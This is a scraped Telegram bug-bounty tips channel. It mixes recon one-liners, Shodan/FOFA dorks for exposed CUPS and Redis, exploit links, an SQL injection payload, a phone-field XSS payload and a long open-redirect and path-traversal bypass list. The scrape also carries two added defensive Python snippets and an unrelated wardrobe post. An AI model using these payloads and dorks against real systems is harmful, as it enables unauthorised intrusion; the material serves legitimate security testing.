bugbounty_tech | Unsorted

Telegram channel bugbounty_tech - Bug bounty Tips


🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r


Bug bounty Tips

Subdomain Enumeration Using Web Archive

This is a Bash function for extracting subdomains from Web Archive results. You can add this function to your ~/.bashrc file.

function wayback() {
  curl -sk "http://web.archive.org/cdx/search/cdx?url=*.$1&output=txt&fl=original&collapse=urlkey&page=" | awk -F/ '{gsub(/:.*/, "", $3); print $3}' | sort -u
}


Bug bounty Tips

https://eslam3kl.medium.com/simple-recon-methodology-920f5c5936d4


Bug bounty Tips

Stored XSS Critical or NOT?: https://medium.com/@mrro0o0tt/stored-xss-critical-or-not-da9eb9b19029?source=rss------bug_bounty-5


Bug bounty Tips

REAL-WORLD BUG HUNTING
A Field Guide to Web Hacking

by Peter Yaworski


Bug bounty Tips

Bug Bounty for Beginners 💰

🔖#infosec #cybersecurity #hacking #pentesting #security


Bug bounty Tips

CVE-2024-45409 | Ruby-SAML Auth Bypass In GitLab
What You'll Learn💡
1️⃣ Overview | Description of CVE-2024-45409
2️⃣ Reconnaissance for CVE-2024-45409
Shodan.io
Censys.io
Fofa.info
Hunter.how
ZoomEYE.HK
3️⃣ Exploit ☣️ CVE-2024-45409 | GiveWP WordPress Plugin Exploit
4️⃣ Exploit Installation📥
5️⃣ Exploit Tool Guide🧭
6️⃣ Impact💥
7️⃣ Severity⚠️
8️⃣ Remediation♻️
https://yashsec.com/bug-bounty/cve-2024-45409-auth-bypass-in-gitlab/


Bug bounty Tips

CVE-2024-31449 and others: Multiple vulnerabilities in Redis, 4.5 - 8.8 rating❗️

Three fresh vulnerabilities allow an attacker to perform RCE due to errors in the Lua scripting engine or DoS via malformed Access Control List selectors.

Search at Netlas.io:
👉 Link: https://nt.ls/1G7ul
👉 Dork: protocol:redis

Vendor's advisory: https://github.com/redis/redis/security/advisories/GHSA-whxg-wx83-85p5


Bug bounty Tips

Exploiting Visual Studio via dump files - CVE-2024-30052

https://ynwarcs.github.io/exploiting-vs-dump-files


Bug bounty Tips

If you're into generating subdomains quickly 🚀
check out this website: husseinphp.github.io/subdomain/


Bug bounty Tips

CVE-2024-47076/CVE-2024-47175/CVE-2024-47176/CVE-2024-47177: Multiple CUPS flaws enable Linux remote code execution

A remote unauthenticated attacker can silently replace existing printers' IPP URLs (or install new printers) with a malicious one, resulting in arbitrary command execution on the computer when a print job is started from that computer.

PoC: https://github.com/RickdeJager/cupshax

This PoC uses dns-sd printer discovery, so the target must be able to receive the broadcast message, i.e. be on the same network.

CUPS Report and POC leaked online: https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1

Refer: https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8

Search Query:

HUNTER: header.server="CUPS"
SHODAN: product:"CUPS(IPP)" server: cups
FOFA: server="CUPS"
ZoomEye: app:"CUPS" +title:"CUPS"


P.S. 2.9M+ Services are found on hunter.how yearly


Bug bounty Tips

Finally working on this, and I will be back, getting better and better, guys, so that I can help you understand how things really work...


Bug bounty Tips

For finding hidden parameters:

arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"

arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10  --headers "User-Agent: Mozilla/5.0"


Bug bounty Tips

Rufus - Create bootable USB drives the easy way
https://rufus.ie/en/


Bug bounty Tips

⚡TOP 100 Vulnerabilities Step-by-Step Guide Handbook

https://github.com/Zorono/Learning-PDFs/blob/main/TOP%20100%20Vulnerabilities%20Step-by-Step%20Guide%20Handbook.pdf


Bug bounty Tips

Try this Google dork to find sensitive files on a website:

site:*.dell.com (ext:doc OR ext:docx OR ext:odt OR ext:pdf OR ext:rtf OR ext:ppt OR ext:pptx OR ext:csv OR ext:xls OR ext:xlsx OR ext:txt OR ext:xml OR ext:json OR ext:zip OR ext:rar OR ext:md OR ext:log OR ext:bak OR ext:conf OR ext:sql)


Bug bounty Tips

Wordlists for pentesters


Bug bounty Tips

https://medium.com/@amineaboud/10000-facebook-ssrf-bug-bounty-402bd21e58e5


Bug bounty Tips

#justforinfo
If you are a man, then your wardrobe should at least have: 1 pair of navy blue chinos, 1 pair of beige chinos, 1 pair of jeans, 1 pair of black trousers, 3 pairs of slacks/suit pants (black, navy blue, grey), 1 pair of beige linen trousers, 3 white t-shirts, 3 black t-shirts, 3 navy blue t-shirts, 1 white shirt, 1 white linen shirt with short sleeves, 1 black shirt, 1 navy blue shirt, 3 polos in neutral colors, 1 suit jacket (matching one of your slacks - one complete suit), 1 neutral jacket, 2 belts (brown and black), 1 pair of white sneakers, 2 pairs of Oxfords (brown and black - to match your belts), 2 sweatshirts in neutral colors, 1 hoodie.


Bug bounty Tips

Here are a few good GraphQL reports to learn more about it.

1. hackerone.com/reports/2048725

2. hackerone.com/reports/2524939

3. hackerone.com/reports/2357012

4. hackerone.com/reports/2122671

5. hackerone.com/reports/2207248

6. hackerone.com/reports/1864188

7. hackerone.com/reports/1085332

8. hackerone.com/reports/1084904

9. hackerone.com/reports/1293377

10. hackerone.com/reports/1192460


Bug bounty Tips

https://x.com/0x0SojalSec/status/1844104351662612734?t=xNLitsY0oO8iXlg62OPlvg&s=35


Bug bounty Tips

XSS in Phone Number Field? 👇

Recently I re-watched the NahamCon2022EU talk "RTFR (Read The Bleeping RFC)" by securinti.

One thing I was surprised to find out was that phone number fields can be vulnerable to XSS.

How is that possible?

According to the RFC it is possible to append an "optional parameter" to the number. Something like:

 • 10203040;ext=+22
 • 10203040;isub=12345
 • 10203040;phone-context=example

This can lead to XSS if:

1. The library parses phone numbers according to the RFC and accepts optional parameters such as "phone-context"

2. The phone number is reflected on the web interface without input validation or output encoding

So payloads like "10203040;phone-context=<script>alert(1)</script>" CAN be a valid phone number and trigger XSS

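The defensive side of the post above, as an added example that is not from the post or the talk: a strict parser for the number;param=value syntax that allowlists the RFC 3966 parameters with a per-parameter value grammar, plus output encoding of whatever gets reflected. The grammar is a simplified assumption (digits-only ext, domain name or global number for phone-context), not any particular library's rules.

```python
import html
import re
from typing import Optional

# Simplified RFC 3966 grammar (assumption, not a library's own rules):
# a global or local number, then optional ";name=value" parameters.
NUMBER = re.compile(r"^\+?[0-9]{3,15}$")
PARAM_RULES = {
    "ext": re.compile(r"^[0-9]{1,10}$"),             # extension: digits only
    "isub": re.compile(r"^[0-9A-Za-z._~-]{1,32}$"),  # ISDN subaddress
    # phone-context: a domain name or a global number (+digits)
    "phone-context": re.compile(r"^(\+[0-9]{1,15}|[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*)$"),
}


def parse_phone(raw: str) -> Optional[dict]:
    """Return {'number': ..., 'params': {...}} or None if any piece is invalid.

    Unknown parameters, a missing '=' and values outside the per-parameter
    allowlist are rejected outright instead of being stored and reflected.
    """
    number, *params = raw.split(";")
    if not NUMBER.match(number):
        return None
    parsed = {}
    for item in params:
        name, sep, value = item.partition("=")
        rule = PARAM_RULES.get(name.lower())
        if not sep or rule is None or not rule.match(value):
            return None
        parsed[name.lower()] = value
    return {"number": number, "params": parsed}


def render_phone(raw: str) -> str:
    """Output-encode the stored value for an HTML context, whatever validation did."""
    return html.escape(raw, quote=True)


if __name__ == "__main__":
    # Constructed inputs: the post's benign forms and its payload.
    for sample in ("10203040;ext=22", "10203040;phone-context=example",
                   "10203040;phone-context=<script>alert(1)</script>"):
        print(sample, "->", parse_phone(sample), "| rendered:", render_phone(sample))
```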

Bug bounty Tips

World's fastest unlimited single and bulk subdomain finder! Use desktop!

https://cyfare.net/apps/subfind/


Bug bounty Tips

Write-Up — Telegram Anonymous Chat Hack Bot: https://medium.com/@EroHack/write-up-telegram-anonymous-chat-hack-bot-ad3497f813ed?source=rss------bug_bounty-5


Bug bounty Tips

SQL Injection
CVE-2024-36837

Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334

#BugBounty #Tips


Bug bounty Tips

Fuzzing from First Principles

https://zerodayengineering.com/research/slides/FuzzingFromFirstPrinciples.pdf


Bug bounty Tips

You can try these effective manual open redirect bypasses:

1. Null-byte injection:
   - /google.com%00/
   - //google.com%00
 
2. Base64 encoding variations:
   - aHR0cDovL2dvb2dsZS5jb20=
   - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
   - //base64:d3d3Lmdvb2dsZS5jb20=/
 
3. Case-sensitive variations:
   - //GOOGLE.com/
   - //GoOgLe.com/

4. Overlong UTF-8 sequences:
   - %C0%AE%C0%AE%2F (overlong encoding for ../)
   - %C0%AF%C0%AF%2F%2Fgoogle.com

5. Mixed encoding schemes:
   - /%68%74%74%70://google.com
   - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
   - //base64:%2F%2Fgoogle.com/

6. Alternative domain notations:
   - //google.com@127.0.0.1/
   - //127.0.0.1.xip.io/
   - //0x7F000001/ (hexadecimal IP)

7. Trailing special characters:
   - //google.com/#/
   - //google.com/;&/
   - //google.com/?id=123&//

8. Octal IP address format:
   - http://0177.0.0.1/
   - http://00177.0000.0000.0001/

9. IP address variants:
   - http://3232235777 (decimal notation of an IP)
   - http://0xC0A80001 (hex notation of IP)
   - http://192.168.1.1/

10. Path traversal with encoding:
    - /..%252f..%252f..%252fetc/passwd
    - /%252e%252e/%252e%252e/%252e%252e/etc/passwd
    - /..%5c..%5c..%5cwindows/system32/cmd.exe

11. Alternate protocol inclusion:
    - ftp://google.com/
    - javascript:alert(1)//google.com

12. Protocol-relative URLs:
    - :////google.com/
    - :///google.com/

13. Redirection edge cases:
    - //google.com/?q=//bing.com/
    - //google.com?q=https://another-site.com/

14. IPv6 notation:
    - http://[::1]/
    - http://[::ffff:192.168.1.1]/
   
15. Double URL encoding:
    - %252f%252fgoogle.com (encoded twice)
    - %255cgoogle.com

16. Combined traversal & encoding:
    - /%2E%2E/%2E%2E/etc/passwd
    - /%2e%2e%5c%2e%2e/etc/passwd

17. Reverse DNS-based:
    - https://google.com.reverselookup.com
    - //lookup-reversed.google.com/

18. Non-standard ports:
    - http://google.com:81/
    - https://google.com:444/

19. Unicode obfuscation in paths:
    - /%E2%80%8Egoogle.com/
    - /%C2%A0google.com/

20. Query parameters obfuscation:
    - //google.com/?q=http://another-site.com/
    - //google.com/?redirect=https://google.com/

21. Using @ symbol for userinfo:
    - https://admin:password@google.com/
    - http://@google.com

22. Combination of userinfo and traversal:
    - https://admin:password@google.com/../../etc/passwd

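The defensive counterpart to the list above, added here and not part of the post: a redirect-target allowlist that accepts only a single-slash, same-origin path and re-checks the value after one and two rounds of percent-decoding, so the null-byte, double-encoding, backslash, userinfo and protocol-relative variants are all refused. APP_ORIGIN is an assumed placeholder for the site issuing the redirect.

```python
import re
from urllib.parse import unquote, urljoin, urlsplit

APP_ORIGIN = "https://app.example"  # assumption: origin of the site issuing the redirect

# Allowlist: exactly one leading slash (no "//" or "/\"), then printable ASCII.
# NUL bytes, non-ASCII padding and overlong UTF-8 fall outside this range.
LOCAL_PATH = re.compile(r"^/(?![/\\])[\x20-\x7e]*$")


def is_safe_redirect(target: str) -> bool:
    """True only if `target` is a path on APP_ORIGIN.

    The raw value and its first and second percent-decoded forms must all
    pass, which catches %00, %252f and %5c tricks that a single
    decode-then-check would miss.
    """
    candidates = [target, unquote(target), unquote(unquote(target))]
    origin = urlsplit(APP_ORIGIN)
    for cand in candidates:
        if "\\" in cand or not LOCAL_PATH.match(cand):
            return False
        # Resolve the way a browser would and confirm the origin is unchanged.
        resolved = urlsplit(urljoin(APP_ORIGIN + "/", cand))
        if (resolved.scheme, resolved.netloc) != (origin.scheme, origin.netloc):
            return False
    return True


def safe_redirect_or_default(target: str, default: str = "/") -> str:
    """What a login handler should do with a ?next= value: keep it or fall back."""
    return target if is_safe_redirect(target) else default


if __name__ == "__main__":
    # Constructed samples: one legitimate path plus variants from the list above.
    samples = ["/account/settings?tab=1", "//google.com%00", "/google.com%00/",
               "%252f%252fgoogle.com", "//google.com@127.0.0.1/",
               "/%2e%2e%5c%2e%2e/etc/passwd", "https://admin:password@google.com/"]
    for s in samples:
        print(f"{s!r:45} -> {is_safe_redirect(s)}")
```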

Bug bounty Tips

How to Create a Fun, Engaging, and Long-Lasting Bug Bounty Program for Your Community: https://medium.com/@GrowthKingdom/how-to-create-a-fun-engaging-and-long-lasting-bug-bounty-program-for-your-community-f67da7fb230a?source=rss------bug_bounty-5


Bug bounty Tips

The Hacker Mentality

https://www.youtube.com/watch?v=X2uK5fd0VxA


Bug bounty Tips

GitHub - securelayer7/CVE-2024-38856_Scanner: Apache OFBiz RCE Scanner & Exploit (CVE-2024-38856)

https://github.com/securelayer7/CVE-2024-38856_Scanner


Bug bounty Tips

Finding Hidden Parameters & Potential XSS with Arjun + KXSS

arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss
